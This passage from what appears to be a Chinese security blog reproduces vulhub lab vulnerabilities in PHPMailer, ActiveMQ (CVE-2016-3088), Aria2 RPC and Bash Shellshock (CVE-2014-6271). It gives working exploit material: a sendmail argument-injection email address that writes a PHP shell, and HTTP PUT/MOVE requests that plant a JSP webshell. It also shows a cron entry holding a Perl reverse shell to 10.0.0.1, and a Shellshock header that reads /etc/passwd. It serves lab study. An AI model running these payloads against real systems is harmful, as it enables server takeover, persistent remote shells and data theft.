class="variable">$patternselect</span>, <span class="variable">$address</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">//Reject line breaks in addresses; it&#x27;s valid RFC5322, but not RFC5321</span></span><br><span class="line">        <span class="keyword">if</span> (<span class="title function_ invoke__">strpos</span>(<span class="variable">$address</span>, <span class="string">&quot;\n&quot;</span>) !== <span class="literal">false</span> <span class="keyword">or</span> <span class="title function_ invoke__">strpos</span>(<span class="variable">$address</span>, <span class="string">&quot;\r&quot;</span>) !== <span class="literal">false</span>) &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (!<span class="variable">$patternselect</span> <span class="keyword">or</span> <span class="variable">$patternselect</span> == <span class="string">&#x27;auto&#x27;</span>) &#123;</span><br><span class="line">            <span class="comment">//Check this constant first so it works when extension_loaded() is disabled by safe mode</span></span><br><span class="line">            <span class="comment">//Constant was added in PHP 5.2.4</span></span><br><span class="line">            <span class="keyword">if</span> (<span class="title function_ invoke__">defined</span>(<span class="string">&#x27;PCRE_VERSION&#x27;</span>)) &#123;</span><br><span class="line">                <span class="comment">//This pattern can get stuck in a recursive loop in PCRE &lt;= 8.0.2</span></span><br><span class="line">                <span class="keyword">if</span> (<span class="title function_ invoke__">version_compare</span>(PCRE_VERSION, <span class="string">&#x27;8.0.3&#x27;</span>) &gt;= <span class="number">0</span>) &#123;</span><br><span class="line">                    <span class="variable">$patternselect</span> = <span class="string">&#x27;pcre8&#x27;</span>;</span><br><span class="line">                &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                    <span class="variable">$patternselect</span> = <span class="string">&#x27;pcre&#x27;</span>;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125; <span class="keyword">elseif</span> (<span class="title function_ invoke__">function_exists</span>(<span class="string">&#x27;extension_loaded&#x27;</span>) <span class="keyword">and</span> <span class="title function_ invoke__">extension_loaded</span>(<span class="string">&#x27;pcre&#x27;</span>)) &#123;</span><br><span class="line">                <span class="comment">//Fall back to older PCRE</span></span><br><span class="line">                <span class="variable">$patternselect</span> = <span class="string">&#x27;pcre&#x27;</span>;</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                <span class="comment">//Filter_var appeared in PHP 5.2.0 and does not require the PCRE extension</span></span><br><span class="line">                <span class="keyword">if</span> (<span class="title function_ invoke__">version_compare</span>(PHP_VERSION, <span class="string">&#x27;5.2.0&#x27;</span>) &gt;= <span class="number">0</span>) &#123;</span><br><span class="line">                    <span class="variable">$patternselect</span> = <span class="string">&#x27;php&#x27;</span>;</span><br><span class="line">                &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                    <span class="variable">$patternselect</span> = <span class="string">&#x27;noregex&#x27;</span>;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">switch</span> (<span class="variable">$patternselect</span>) &#123;</span><br><span class="line">            <span class="keyword">case</span> <span class="string">&#x27;pcre8&#x27;</span>:</span><br><span class="line">                <span class="comment">/**</span></span><br><span class="line"><span class="comment">                 * Uses the same RFC5322 regex on which FILTER_VALIDATE_EMAIL is based, but allows dotless domains.</span></span><br><span class="line"><span class="comment">                 * <span class="doctag">@link</span> http://squiloople.com/2009/12/20/email-address-validation/</span></span><br><span class="line"><span class="comment">                 * <span class="doctag">@copyright</span> 2009-2010 Michael Rushton</span></span><br><span class="line"><span class="comment">                 * Feel free to use and redistribute this code. But please keep this copyright notice.</span></span><br><span class="line"><span class="comment">                 */</span></span><br><span class="line">                <span class="keyword">return</span> (<span class="keyword">boolean</span>)<span class="title function_ invoke__">preg_match</span>(</span><br><span class="line">                    <span class="string">&#x27;/^(?!(?&gt;(?1)&quot;?(?&gt;\\\[ -~][^&quot;])&quot;?(?1))&#123;255,&#125;)(?!(?&gt;(?1)&quot;?(?&gt;\\\[ -~][^&quot;])&quot;?(?1))&#123;65,&#125;@)&#x27;</span> .</span><br><span class="line">                    <span class="string">&#x27;((?&gt;(?&gt;(?&gt;((?&gt;(?&gt;(?&gt;\x0D\x0A)?[\t ])+(?&gt;[\t ]*\x0D\x0A)?[\t ]+)?)(\((?&gt;(?2)&#x27;</span> .</span><br><span class="line">                    <span class="string">&#x27;(?&gt;[\x01-\x08\x0B\x0C\x0E-\&#x27;*-\[\]-\x7F]\\\[\x00-\x7F](?3)))*(?2)\)))+(?2))(?2))?)&#x27;</span> .</span><br><span class="line">                    <span class="string">&#x27;([!#-\&#x27;*+\/-9=?^-~-]+&quot;(?&gt;(?2)(?&gt;[\x01-\x08\x0B\x0C\x0E-!#-\[\]-\x7F]\\\[\x00-\x7F]))*&#x27;</span> .</span><br><span class="line">                    <span class="string">&#x27;(?2)&quot;)(?&gt;(?1)\.(?1)(?4))*(?1)@(?!(?1)[a-z0-9-]&#123;64,&#125;)(?1)(?&gt;([a-z0-9](?&gt;[a-z0-9-]*[a-z0-9])?)&#x27;</span> .</span><br><span class="line">                    <span class="string">&#x27;(?&gt;(?1)\.(?!(?1)[a-z0-9-]&#123;64,&#125;)(?1)(?5))&#123;0,126&#125;\[(?:(?&gt;IPv6:(?&gt;([a-f0-9]&#123;1,4&#125;)(?&gt;:(?6))&#123;7&#125;&#x27;</span> .</span><br><span class="line">                    <span class="string">&#x27;(?!(?:.*[a-f0-9][:\]])&#123;8,&#125;)((?6)(?&gt;:(?6))&#123;0,6&#125;)?::(?7)?))(?&gt;(?&gt;IPv6:(?&gt;(?6)(?&gt;:(?6))&#123;5&#125;:&#x27;</span> .</span><br><span class="line">                    <span class="string">&#x27;(?!(?:.*[a-f0-9]:)&#123;6,&#125;)(?8)?::(?&gt;((?6)(?&gt;:(?6))&#123;0,4&#125;):)?))?(25[0-5]2[0-4][0-9]1[0-9]&#123;2&#125;&#x27;</span> .</span><br><span class="line">                    <span class="string">&#x27;[1-9]?[0-9])(?&gt;\.(?9))&#123;3&#125;))\])(?1)$/isD&#x27;</span>,</span><br><span class="line">                    <span class="variable">$address</span></span><br><span class="line">                );</span><br><span class="line">            <span class="keyword">case</span> <span class="string">&#x27;pcre&#x27;</span>:</span><br><span class="line">                <span class="comment">//An older regex that doesn&#x27;t need a recent PCRE</span></span><br><span class="line">                <span class="keyword">return</span> (<span class="keyword">boolean</span>)<span class="title function_ invoke__">preg_match</span>(</span><br><span class="line">                    <span class="string">&#x27;/^(?!(?&gt;&quot;?(?&gt;\\\[ -~][^&quot;])&quot;?)&#123;255,&#125;)(?!(?&gt;&quot;?(?&gt;\\\[ -~][^&quot;])&quot;?)&#123;65,&#125;@)(?&gt;&#x27;</span> .</span><br><span class="line">                    <span class="string">&#x27;[!#-\&#x27;*+\/-9=?^-~-]+&quot;(?&gt;(?&gt;[\x01-\x08\x0B\x0C\x0E-!#-\[\]-\x7F]\\\[\x00-\xFF]))*&quot;)&#x27;</span> .</span><br><span class="line">                    <span class="string">&#x27;(?&gt;\.(?&gt;[!#-\&#x27;*+\/-9=?^-~-]+&quot;(?&gt;(?&gt;[\x01-\x08\x0B\x0C\x0E-!#-\[\]-\x7F]\\\[\x00-\xFF]))*&quot;))*&#x27;</span> .</span><br><span class="line">                    <span class="string">&#x27;@(?&gt;(?![a-z0-9-]&#123;64,&#125;)(?&gt;[a-z0-9](?&gt;[a-z0-9-]*[a-z0-9])?)(?&gt;\.(?![a-z0-9-]&#123;64,&#125;)&#x27;</span> .</span><br><span class="line">                    <span class="string">&#x27;(?&gt;[a-z0-9](?&gt;[a-z0-9-]*[a-z0-9])?))&#123;0,126&#125;\[(?:(?&gt;IPv6:(?&gt;(?&gt;[a-f0-9]&#123;1,4&#125;)(?&gt;:&#x27;</span> .</span><br><span class="line">                    <span class="string">&#x27;[a-f0-9]&#123;1,4&#125;)&#123;7&#125;(?!(?:.*[a-f0-9][:\]])&#123;8,&#125;)(?&gt;[a-f0-9]&#123;1,4&#125;(?&gt;:[a-f0-9]&#123;1,4&#125;)&#123;0,6&#125;)?&#x27;</span> .</span><br><span class="line">                    <span class="string">&#x27;::(?&gt;[a-f0-9]&#123;1,4&#125;(?&gt;:[a-f0-9]&#123;1,4&#125;)&#123;0,6&#125;)?))(?&gt;(?&gt;IPv6:(?&gt;[a-f0-9]&#123;1,4&#125;(?&gt;:&#x27;</span> .</span><br><span class="line">                    <span class="string">&#x27;[a-f0-9]&#123;1,4&#125;)&#123;5&#125;:(?!(?:.*[a-f0-9]:)&#123;6,&#125;)(?&gt;[a-f0-9]&#123;1,4&#125;(?&gt;:[a-f0-9]&#123;1,4&#125;)&#123;0,4&#125;)?&#x27;</span> .</span><br><span class="line">                    <span class="string">&#x27;::(?&gt;(?:[a-f0-9]&#123;1,4&#125;(?&gt;:[a-f0-9]&#123;1,4&#125;)&#123;0,4&#125;):)?))?(?&gt;25[0-5]2[0-4][0-9]1[0-9]&#123;2&#125;&#x27;</span> .</span><br><span class="line">                    <span class="string">&#x27;[1-9]?[0-9])(?&gt;\.(?&gt;25[0-5]2[0-4][0-9]1[0-9]&#123;2&#125;[1-9]?[0-9]))&#123;3&#125;))\])$/isD&#x27;</span>,</span><br><span class="line">                    <span class="variable">$address</span></span><br><span class="line">                );</span><br><span class="line">            <span class="keyword">case</span> <span class="string">&#x27;html5&#x27;</span>:</span><br><span class="line">                <span class="comment">/**</span></span><br><span class="line"><span class="comment">                 * This is the pattern used in the HTML5 spec for validation of &#x27;email&#x27; type form input elements.</span></span><br><span class="line"><span class="comment">                 * <span class="doctag">@link</span> http://www.whatwg.org/specs/web-apps/current-work/#e-mail-state-(type=email)</span></span><br><span class="line"><span class="comment">                 */</span></span><br><span class="line">                <span class="keyword">return</span> (<span class="keyword">boolean</span>)<span class="title function_ invoke__">preg_match</span>(</span><br><span class="line">                    <span class="string">&#x27;/^[a-zA-Z0-9.!#$%&amp;\&#x27;*+\/=?^_`&#123;&#125;~-]+@[a-zA-Z0-9](?:[a-zA-Z0-9-]&#123;0,61&#125;&#x27;</span> .</span><br><span class="line">                    <span class="string">&#x27;[a-zA-Z0-9])?(?:\.[a-zA-Z0-9](?:[a-zA-Z0-9-]&#123;0,61&#125;[a-zA-Z0-9])?)*$/sD&#x27;</span>,</span><br><span class="line">                    <span class="variable">$address</span></span><br><span class="line">                );</span><br><span class="line">            <span class="keyword">case</span> <span class="string">&#x27;noregex&#x27;</span>:</span><br><span class="line">                <span class="comment">//No PCRE! Do something _very_ approximate!</span></span><br><span class="line">                <span class="comment">//Check the address is 3 chars or longer and contains an @ that&#x27;s not the first or last char</span></span><br><span class="line">                <span class="keyword">return</span> (<span class="title function_ invoke__">strlen</span>(<span class="variable">$address</span>) &gt;= <span class="number">3</span></span><br><span class="line">                    <span class="keyword">and</span> <span class="title function_ invoke__">strpos</span>(<span class="variable">$address</span>, <span class="string">&#x27;@&#x27;</span>) &gt;= <span class="number">1</span></span><br><span class="line">                    <span class="keyword">and</span> <span class="title function_ invoke__">strpos</span>(<span class="variable">$address</span>, <span class="string">&#x27;@&#x27;</span>) != <span class="title function_ invoke__">strlen</span>(<span class="variable">$address</span>) - <span class="number">1</span>);</span><br><span class="line">            <span class="keyword">case</span> <span class="string">&#x27;php&#x27;</span>:</span><br><span class="line">            <span class="keyword">default</span>:</span><br><span class="line">                <span class="keyword">return</span> (<span class="keyword">boolean</span>)<span class="title function_ invoke__">filter_var</span>(<span class="variable">$address</span>, FILTER_VALIDATE_EMAIL);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<h4 id="分析patternselect">分析patternselect</h4>
<p>分析一下patternselect决定对email的判断
1.默认的是auto,自动选择一个方式对email进行检测
2.如果php支持pcre那么就用正则来检测
3.如果不支持pcre但是php版本大于5.2就用php的filter进行检测
4.如果不支持pcre但是php版本小于5.2那么直接检查email是否包含@符号
那么目前来看,最佳情况就是php版本小于5.2而且不支持正则表达式(未安装pcre扩展)
不过p神表示还是有其他的方式也是可以打的,比如开发者手动指定email检查 <img
src="/images/2018/07/phithon-2.jpg" alt="blacsheep" /></p>
<h4 id="分析正则表达式">分析正则表达式</h4>
<p><a
target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/how-to-analyze-long-regex.html"
title="p神的分析过程">p神的分析过程</a>
最终就是在@前面加上括号就可以加入空格,payload如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">aaa( -X/home/www/success.php )@qq.com</span><br></pre></td></tr></table></figure>
<p>测试代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">require</span> <span class="string">&#x27;PHPMailer/PHPMailerAutoload.php&#x27;</span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">send</span>(<span class="params"><span class="variable">$from</span></span>) </span>&#123;</span><br><span class="line">    <span class="variable">$mail</span> = <span class="keyword">new</span> <span class="title class_">PHPMailer</span>;</span><br><span class="line"></span><br><span class="line">    <span class="variable">$mail</span>-&gt;<span class="title function_ invoke__">setFrom</span>(<span class="variable">$from</span>);</span><br><span class="line">    <span class="variable">$mail</span>-&gt;<span class="title function_ invoke__">addAddress</span>(<span class="string">&#x27;joe@example.net&#x27;</span>, <span class="string">&#x27;Joe User&#x27;</span>);     <span class="comment">// Add a recipient</span></span><br><span class="line"></span><br><span class="line">    <span class="variable">$mail</span>-&gt;<span class="title function_ invoke__">isHTML</span>(<span class="literal">true</span>);                                  <span class="comment">// Set email format to HTML</span></span><br><span class="line"></span><br><span class="line">    <span class="variable">$mail</span>-&gt;Subject = <span class="string">&#x27;&lt;?php phpinfo(); ?&gt;&#x27;</span>;</span><br><span class="line">    <span class="variable">$mail</span>-&gt;Body    = <span class="string">&#x27;This is the HTML message body &lt;b&gt;in bold!&lt;/b&gt;&#x27;</span>;</span><br><span class="line">    <span class="variable">$mail</span>-&gt;AltBody = <span class="string">&#x27;This is the body in plain text for non-HTML mail clients&#x27;</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(!<span class="variable">$mail</span>-&gt;<span class="title function_ invoke__">send</span>()) &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&#x27;Message could not be sent.&#x27;</span>;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&#x27;Mailer Error: &#x27;</span> . <span class="variable">$mail</span>-&gt;ErrorInfo;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&#x27;Message has been sent&#x27;</span> . <span class="string">&quot;\n&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">unset</span>(<span class="variable">$mail</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$address</span> = <span class="string">&quot;aaa( -X/home/www/success.php )@qq.com&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">send</span>(<span class="variable">$address</span>);</span><br></pre></td></tr></table></figure>
<p>执行之后可以发现已经写了shell了 (虽然我并没有执行成功...)
然后phithon师傅还给了个权限不够的时候的payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">aaa( -X/home/www/success.php -OQueueDirectory=/tmp )@qq.com</span><br></pre></td></tr></table></figure>
<h2
id="activemq任意文件写入漏洞cve-2016-3088">ActiveMQ任意文件写入漏洞(CVE-2016-3088)</h2>
<h3 id="原理-1">原理</h3>
<p>ActiveMQ的web控制台分三个应用，admin、api和fileserver，其中admin是管理员页面，api是接口，fileserver是储存文件的接口；admin和api都需要登录后才能使用，fileserver无需登录。
fileserver是一个RESTful
API接口，我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作，其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷，但后来发现：
其使用率并不高 文件操作容易出现漏洞
所以，ActiveMQ在<strong>5.12.x~5.13.x</strong>版本中，已经默认关闭了fileserver这个应用（你可以在conf/jetty.xml中开启之）；在<strong>5.14.0版本以后，彻底删除了fileserver应用</strong>。
在测试过程中，可以关注ActiveMQ的版本，避免走弯路。
本次漏洞出现在fileserver应用中,fileserver支持写入文件,同时支持移动文件,所以我们只要写入一个文件然后移动就可以造成任意文件写入.
参考redis的getshell,同样有几种利用方法</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">1.写入webshell</span><br><span class="line">2.写入cron或者ssh key等</span><br><span class="line">3.写入jar或jetty.xml等库和配置文件(不太懂)</span><br></pre></td></tr></table></figure>
<h3 id="搭环境-1">搭环境</h3>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">docker-compose build</span><br><span class="line">docker-compose up -d</span><br></pre></td></tr></table></figure>
<p>然后环境会监听8161端口和61616端口,其中8161是web控制台端口,而漏洞就出现在这个端口,我们访问<code>http://192.168.0.104:8161</code>看到web页面即成功运行
<img src="/images/2018/07/vul-1.jpg" alt="blacsheep" />
其中admin页面的默认登录帐号密码都是admin</p>
<h3 id="攻击-1">攻击</h3>
<h4 id="写webshell">写webshell</h4>
<p>写webshell要求登录进去,默认帐号密码admin,访问<code>http://ip_address:8161/admin/test/systemProperties.jsp</code>然后得到ActiveMQ的默认路径:
<img src="/images/2018/07/vul-2.jpg" alt="blacsheep" />
然后传webshell</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">PUT</span> <span class="string">/fileserver/1.txt</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>localhost:8161</span><br><span class="line"><span class="attribute">Upgrade-Insecure-Requests</span><span class="punctuation">: </span>1</span><br><span class="line"><span class="attribute">User-Agent</span><span class="punctuation">: </span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36</span><br><span class="line"><span class="attribute">Accept</span><span class="punctuation">: </span>text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8</span><br><span class="line"><span class="attribute">Accept-Encoding</span><span class="punctuation">: </span>gzip, deflate</span><br><span class="line"><span class="attribute">Accept-Language</span><span class="punctuation">: </span>zh-CN,zh;q=0.9,en;q=0.8</span><br><span class="line"><span class="attribute">Connection</span><span class="punctuation">: </span>close</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>36164</span><br><span class="line"></span><br><span class="line"><span class="language-gams"><span class="function"><span class="title">webshell</span></span>...</span></span><br></pre></td></tr></table></figure>
<figure>
<img src="/images/2018/07/vul-3.jpg" alt="blacsheep" />
<figcaption aria-hidden="true">blacsheep</figcaption>
</figure>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">MOVE</span> <span class="string">/fileserver/1.txt</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Destination</span><span class="punctuation">: </span>file:///opt/activemq/webapps/api/shell.jsp</span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>localhost:8161</span><br><span class="line"><span class="attribute">Upgrade-Insecure-Requests</span><span class="punctuation">: </span>1</span><br><span class="line"><span class="attribute">User-Agent</span><span class="punctuation">: </span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36</span><br><span class="line"><span class="attribute">Accept</span><span class="punctuation">: </span>text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8</span><br><span class="line"><span class="attribute">Accept-Encoding</span><span class="punctuation">: </span>gzip, deflate</span><br><span class="line"><span class="attribute">Accept-Language</span><span class="punctuation">: </span>zh-CN,zh;q=0.9,en;q=0.8</span><br><span class="line"><span class="attribute">Connection</span><span class="punctuation">: </span>close</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>0</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p><img src="/images/2018/07/vul-4.jpg" alt="blacsheep" />
然后连上去就可以了 <img src="/images/2018/07/vul-5.jpg"
alt="blacsheep" /></p>
<h4 id="写入crontab自动反弹shell">写入crontab,自动反弹shell</h4>
<p>首先传cron配置文件,然后移动到/etc/cron.d/root</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">PUT</span> <span class="string">/fileserver/1.txt</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>localhost:8161</span><br><span class="line"><span class="attribute">Accept</span><span class="punctuation">: </span>*/*</span><br><span class="line"><span class="attribute">Accept-Language</span><span class="punctuation">: </span>en</span><br><span class="line"><span class="attribute">User-Agent</span><span class="punctuation">: </span>Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)</span><br><span class="line"><span class="attribute">Connection</span><span class="punctuation">: </span>close</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>248</span><br><span class="line"></span><br><span class="line"><span class="language-tcl">*/<span class="number">1</span> * * * * root /usr/bin/perl -e &#x27;use Socket;<span class="variable">$i</span>=<span class="string">&quot;10.0.0.1&quot;</span>;<span class="variable">$p</span>=<span class="number">21</span>;<span class="keyword">socket</span>(S,PF_INET,SOCK_STREAM,getprotobyname(<span class="string">&quot;tcp&quot;</span>));<span class="keyword">if</span>(connect(S,sockaddr_in(<span class="variable">$p</span>,inet_aton(<span class="variable">$i</span>))))&#123;<span class="keyword">open</span>(STDIN,<span class="string">&quot;&gt;&amp;S&quot;</span>);<span class="keyword">open</span>(STDOUT,<span class="string">&quot;&gt;&amp;S&quot;</span>);<span class="keyword">open</span>(STDERR,<span class="string">&quot;&gt;&amp;S&quot;</span>);<span class="keyword">exec</span>(<span class="string">&quot;/bin/sh -i&quot;</span>);&#125;;&#x27;</span></span><br><span class="line"><span class="language-tcl"><span class="comment">##</span></span></span><br></pre></td></tr></table></figure>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">MOVE</span> <span class="string">/fileserver/1.txt</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Destination</span><span class="punctuation">: </span>file:///etc/cron.d/root</span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>localhost:8161</span><br><span class="line"><span class="attribute">Accept</span><span class="punctuation">: </span>*/*</span><br><span class="line"><span class="attribute">Accept-Language</span><span class="punctuation">: </span>en</span><br><span class="line"><span class="attribute">User-Agent</span><span class="punctuation">: </span>Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)</span><br><span class="line"><span class="attribute">Connection</span><span class="punctuation">: </span>close</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>0</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>得到反弹的shell <img src="/images/2018/07/vul-6.jpg"
alt="blacsheep" /></p>
<h3 id="分析-1">分析</h3>
<p>没啥好分析的,就是一个对任意文件写的简单利用</p>
<h2 id="aria2-任意文件写入漏洞">Aria2 任意文件写入漏洞</h2>
<h3 id="原理-2">原理</h3>
<p>aria2是一个命令行下的轻量级下载工具,内建xml-rpc和json-rpc的接口,在有权限的情况下我们可以操作接口来下载文件,将文件下载到任意目录,造成任意文件写入
参考文章:<a target="_blank" rel="noopener" href="https://paper.seebug.org/120/"
title="https://paper.seebug.org/120/">https://paper.seebug.org/120/</a></p>
<h3 id="搭环境-2">搭环境</h3>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker-compose up -d</span><br></pre></td></tr></table></figure>
<p>6800是aria2的rpc默认端口,环境启动之后访问<code>http://your_ip:6800</code>发现服务已经启动并且返回404</p>
<h3 id="攻击-2">攻击</h3>
<p>由于这里需要进行rpc通信,比较麻烦,使用一个第三方的gui <a
target="_blank" rel="noopener" href="https://github.com/binux/yaaw"
title="https://github.com/binux/yaaw">https://github.com/binux/yaaw</a>
使用非常简单,解压之后打开index即可,然后进行简单配置 <img
src="/images/2018/07/vul-8.jpg" alt="blacsheep" /> <img
src="/images/2018/07/vul-9.jpg" alt="blacsheep" />
然后我们只用新建下载任务,就可以将任务目标下载到服务器的指定位置了,比如我们写一个文件到/etc/cron.d下,让它执行一个反弹shell的操作
<img src="/images/2018/07/vul-10.jpg" alt="blacsheep" />
然后add,成果的话会显示 <img src="/images/2018/07/vul-11.jpg"
alt="blacsheep" /> 然后脸上shell文件里面写的ip即可拿到shell <img
src="/images/2018/07/vul-7.jpg" alt="blacsheep" /></p>
<h3 id="分析-2">分析</h3>
<p>在未设置任何安全措施的情况下，Aria2 RPC Server
可以接受任何未知来源的请求指令，并予以下载。即使存在诸如--rpc-secret、--rpc-user、--rpc-passwd之类的安全措施，也可以通过社会工程学手段进行攻击。通过
Aria2 RPC Server，可以进行 SSRF、Arbitrary File Write 等 Web
攻击手法，获取服务器权限。
其实说到底还是安全认证没做好,这个就是一个裸的任意文件上传,没啥好说的,做好认证的话可能会好一些</p>
<h2 id="shell破壳漏洞cve-2014-6271">Shell破壳漏洞(CVE-2014-6271)</h2>
<h3 id="原理-3">原理</h3>
<p>目前的bash使用的环境变量是通过函数名称来调用的，导致漏洞出问题是以“(){”开头定义的环境变量在命令ENV中解析成函数后，Bash执行并未退出，而是继续解析并执行shell命令。核心的原因在于在输入的过滤中没有严格限制边界，没有做合法化的参数判断。</p>
<h3 id="搭环境-3">搭环境</h3>
<p>还是用的vulhub里面的docker</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">docker-compose build</span><br><span class="line">docker-compose up -d</span><br></pre></td></tr></table></figure>
<h3 id="攻击-3">攻击</h3>
<p>这个漏洞本来是shell里环境变量的漏洞,不过如果第三方软件用到了shell,那么就可以导致问题的出现,比较典型的是apache,总的原理图如下
<img src="/images/2018/07/vul-12.png" alt="blacsheep" /></p>
<h4 id="本地测试">本地测试</h4>
<p>可以在shell里面执行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">env x=&#x27;() &#123; :;&#125;; echo Vulnerable CVE-2014-6271 &#x27; bash -c &quot;echo test&quot;</span><br></pre></td></tr></table></figure>
<p>如果出现了<code>Vulnerable CVE-2014-6271</code>则存在此漏洞,比如 <img
src="/images/2018/07/vul-13.png" alt="blacsheep" /></p>
<h4 id="远程利用">远程利用</h4>
<p>如果某apache利用的是shell的解析,而且shell版本很低的话,就可以导致任意命令执行</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">GET</span> <span class="string">/victim.cgi</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>192.168.0.104</span><br><span class="line"><span class="attribute">Accept</span><span class="punctuation">: </span>*/*</span><br><span class="line"><span class="attribute">Accept-Language</span><span class="punctuation">: </span>en</span><br><span class="line"><span class="attribute">x</span><span class="punctuation">: </span>() &#123; : ; &#125;;a=`/bin/cat /etc/passwd`;echo $a;</span><br><span class="line"><span class="attribute">Connection</span><span class="punctuation">: </span>close</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>1</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<figure>
<img src="/images/2018/07/vul-14.jpg" alt="blacsheep" />
